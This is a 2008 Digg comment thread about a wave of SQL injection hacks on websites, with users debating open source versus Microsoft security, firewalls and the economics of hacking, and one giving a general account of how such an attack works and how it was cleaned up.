What is Digg?43 Comments
- inactive, on 07/17/2008, -1/+13Alright, that's it, shut down the internet, we all lose the privilege.
- justananomaly, on 07/17/2008, -2/+12If hackers/exploiters didn't exist a lot of security people would lose their job. A little chaos can do a lot for the economy.
- xlocust, on 07/17/2008, -0/+9open source != secure
Ask anybody with a hacked drupal or wordpress site. - Matt2k, on 07/17/2008, -0/+9This. um.. A firewall?.. Oh nevermind
- xlocust, on 07/17/2008, -1/+9No Firewall in the world is going to prevent your site from being hacked if you on an webserver using an insecure php setup and/or insecure php code.
- taylorblue, on 07/16/2008, -2/+10My old site was hacked three times finally putting me under and I found that site on one of the searches they said to do...it's a very scary world out there...
- jpaolini, on 07/17/2008, -1/+7Interesting article, it's a shame so many people are running insecure code and websites.
- thesparrowband, on 07/17/2008, -1/+7i think you just described the plot to at least 5 movies. the 5th element to name one..
- hugepedlar, on 07/17/2008, -0/+5The NHS is run on Microsoft technology, which always struck me (when I worked for them) as a bad idea, especially where our private medical records are concerned. Anyone know how these hack are taking place? No clues from the article.
- inactive, on 07/17/2008, -0/+4lol firewall. i guess you don't want people hitting your site at all then.
- MikeFromAmerica, on 07/17/2008, -0/+4That sounds an awful lot like the rationale that war is good for the economy.
(oops. meant to reply to justananomaly. too many reply links...) - shakin, on 07/17/2008, -0/+3"the big difference is that open source tends to get patched quicker."
And if, for example, you're running a vulnerable version of Drupal or other open source software you can fix it yourself. - justananomaly, on 07/17/2008, -0/+3Think of the engineers who can go home to feed their children tonight to have little teeny weeny children of their own and so on and so forth.. thus adding to the great chain of life!
*chokes on cherry* - thedarkwolf, on 07/17/2008, -0/+3True that. Or really any code, not just php. at least with php you can usually fix the vulnerability in one line. mysql_real_escape_strings() anybody. how about htmlspecialchars() for those pesky javascript injections.
The truth is, the only way to secure your website is if you know what you're doing. - Gavagai80, on 07/17/2008, -0/+3Unfortunately most people just don't care. When I send out a notification of a security update for my scripts, I'd estimate about 30% of users actually install it within a reasonable time frame.
- redlantern64, on 07/17/2008, -0/+3Best site hack ever: http://news.bbc.co.uk/1/hi/sci/tech/386565.stm
- thedarkwolf, on 07/17/2008, -0/+3open source may not be secure. In fact, in general there are about the same amount of vulnerabilities in closed source as in open source. the big difference is that open source tends to get patched quicker.
- elders, on 07/17/2008, -2/+4retard
- jellygraph, on 07/17/2008, -0/+2Crime keeps the economy ticking, eh? Interesting theory. Not sure what most people and experts would think of it tho.
- inactive, on 07/17/2008, -0/+2This is why we can't have nice things.
- ramd3z, on 07/17/2008, -0/+2We got nailed 3 times in 1 week by this until finding this site to search for, remove, then prevent the injection again. In the end this site plus better coding practices plus using an HTTP proxy on our firewall have been keeping us safe
http://www.bloombit.com/Articles/2008/05/ASCII-Enc ... - Gavagai80, on 07/17/2008, -0/+2Instead of generalizing a theory that open source is patched quicker, a smart person will actually check how often the software they're considering gets patched.
- ripter, on 07/17/2008, -1/+2It's a shame that people write
- Matt2k, on 07/17/2008, -0/+1I think we might be confusing open source with copyleft software.
Almost all web applications are already open source, if not 'free'. Except for the few guys who distribute their stuff obfuscated (Ioncube, ) or compiled (.NET, JSP, ...). - Nextrix, on 07/17/2008, -0/+1And if there wasn't any exploits being created or found then the security people would all be out of a job.
- slug007, on 07/17/2008, -2/+3Test, then apply security updates asap. Open Source as well!
- shftleft, on 07/18/2008, -0/+1Why so many parking tickets?
- TRScheel, on 07/17/2008, -0/+1Hey dont knock that kinda security. At least it wont get hacked!
- inactive, on 07/17/2008, -0/+1awesome.
- jellygraph, on 07/17/2008, -0/+1Hehe, I'm glad I get to run and administer all my company's servers myself. I wouldn't trust any other geek I've never met before.
- dakellog, on 07/18/2008, -0/+1nhh.uk and snapple.com, two hacked sites, run IIS. I searched google for other hacked sites. The first 3 hacked sites I reviewed ran Windows software. I have read many articles about hacks, only to find out the sites run IIS. Not once have I seen an author mention that Microsoft wrote the software that enabled the hackers to do their work, and using Linux or BSD would solve many of these problems.
- justananomaly, on 07/17/2008, -0/+1The air force is spending millions investing in "Cyber Command" centers in airforce bases across the country. Without hackers/exploiters...?
- Matt2k, on 07/17/2008, -0/+1They're just SQL injection attacks. Nothing special about them being on Microsoft products.
There's nothing magical about securing an IIS server versus an Apache one. Run each website in a securely partitioned jail with script applications impersonating the security context of the hosted app, and you're miles ahead of most other people.
If they're the same ones my clients have been getting hit with, they inject a TSQL stored procedure that bulk updates all text fields in the database with script links to malware JS files. Usually it's a destructive process, although sometimes they're kind enough to append instead of obliterate.
Aside from auditing everyone's custom programming, I usually have to restore from a backup, fix the identified point of compromise, run Paros Proxy to scan for other obvious SQL injection holes. I also like to install a filter on IIS that limits querystrings to 512 characters or so. This obviously doesn't protect against POST methods. - AnarchyIsOrder1, on 07/18/2008, -0/+1Broken window fallacy
http://freedomkeys.com/window.htm - inactive, on 07/18/2008, -0/+1Yeah, because every server out there is just sitting wide open on the internet.
- stabbingkittens, on 07/18/2008, -0/+1Malware is a sham
- syariscrewz, on 06/20/2009, -0/+0nice . love it
free music downloads
http://www.hotsmusic.com/ - thedarkwolf, on 07/17/2008, -2/+2lol tru dat. I'm not at all worried. There will always be plenty of people out there writing the malware and I will always have at least that small measure of job security.
- davdev, on 07/17/2008, -1/+1My companies site was hit because our hosting vendor sucks and while doing a system upgrade, the moved the code from one server to another, that hadn't been properly wiped before the transfer. It was infected with a worm and anyone who logged onto our site had their PC infected and shut down. It was not good times
- pizzaguy01, on 07/17/2008, -1/+0whew my site is safe :D
- Hotrox, on 07/17/2008, -4/+3It's a shame that people write malware.
- kmolnar, on 07/17/2008, -2/+0Dumbass.
Firewalls are for clients, not servers.
RTFA. - CLAWC, on 07/16/2008, -12/+1Pwned! Just kidding. Use a strong firewall people!
© Digg Inc. 2009
— Content created and posted by Digg users is